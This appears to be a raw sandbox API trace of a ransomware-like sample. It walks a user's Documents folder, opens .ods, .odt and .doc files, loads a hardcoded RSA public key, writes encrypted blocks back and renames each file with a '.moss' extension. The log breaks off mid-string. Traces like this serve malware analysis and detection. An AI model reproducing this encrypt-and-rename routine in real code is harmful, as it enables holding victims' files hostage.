hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.267] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.267] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.267] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.267] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.267] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.267] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.267] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.267] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.267] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.267] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.267] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.267] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.267] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.267] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.267] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.267] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.267] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.268] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.268] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.268] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.268] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.268] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.268] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.268] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.268] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.268] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.268] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.268] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.268] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.268] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.268] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.268] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.268] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.268] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.268] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.268] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\") returned="ZSqKO4y-pgVGUfXDhW\\" [0172.268] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0172.268] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2eae0 [0172.268] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\") returned="NsI7Q_Ai4cQKUwAhGA5\\" [0172.268] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0172.268] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0172.268] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b51670 [0172.268] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.268] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.269] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.269] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.269] PathFindFileNameW (pszPath="") returned="" [0172.269] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360ef10 [0172.269] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f35e6c0, ftCreationTime.dwHighDateTime=0x1d5de97, ftLastAccessTime.dwLowDateTime=0x4cee7030, ftLastAccessTime.dwHighDateTime=0x1d5dab8, ftLastWriteTime.dwLowDateTime=0x4cee7030, ftLastWriteTime.dwHighDateTime=0x1d5dab8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.269] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\-KRg_.ods") returned=".ods" [0172.269] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\-KRg_.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\-krg_.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.269] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=69769) returned 1 [0172.269] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.272] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x11063, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.272] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.273] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.274] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x11089, lpOverlapped=0x0) returned 1 [0172.274] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.274] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.274] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.274] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.274] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2eae0) returned 1 [0172.276] CryptCreateHash (in: hProv=0xd2eae0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.276] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.276] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.276] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.276] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.276] GetLastError () returned 0x0 [0172.276] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.276] CryptReleaseContext (hProv=0xd2eae0, dwFlags=0x0) returned 1 [0172.276] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.276] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.277] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.277] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.277] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.277] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.278] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x11089, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.278] WriteFile (in: hFile=0x664, lpBuffer=0x35ceae8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35ceae8*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.278] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\-KRg_.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\-krg_.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\-KRg_.ods.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\-krg_.ods.moss")) returned 1 [0172.280] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\-rtk24EwtR.odt") returned=".odt" [0172.280] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\-rtk24EwtR.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\-rtk24ewtr.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.281] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=11628) returned 1 [0172.281] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.284] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x2d46, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.284] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.285] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.285] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x2d6c, lpOverlapped=0x0) returned 1 [0172.285] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.285] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.285] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.285] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.285] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2eae0) returned 1 [0172.286] CryptCreateHash (in: hProv=0xd2eae0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.287] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.287] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.287] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.287] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.287] GetLastError () returned 0x0 [0172.287] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.287] CryptReleaseContext (hProv=0xd2eae0, dwFlags=0x0) returned 1 [0172.287] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.287] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.287] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.287] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.287] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.287] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.288] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x2d6c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.288] WriteFile (in: hFile=0x664, lpBuffer=0x35ceae8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35ceae8*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.288] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\-rtk24EwtR.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\-rtk24ewtr.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\-rtk24EwtR.odt.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\-rtk24ewtr.odt.moss")) returned 1 [0172.290] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\7Ecmz.doc") returned=".doc" [0172.290] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\7Ecmz.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\7ecmz.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.290] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=27883) returned 1 [0172.290] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.294] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x6cc5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.294] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.295] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.295] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x6ceb, lpOverlapped=0x0) returned 1 [0172.295] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.295] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.295] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.295] lstrlenA (lpString="-----BEGIN PUBLIC 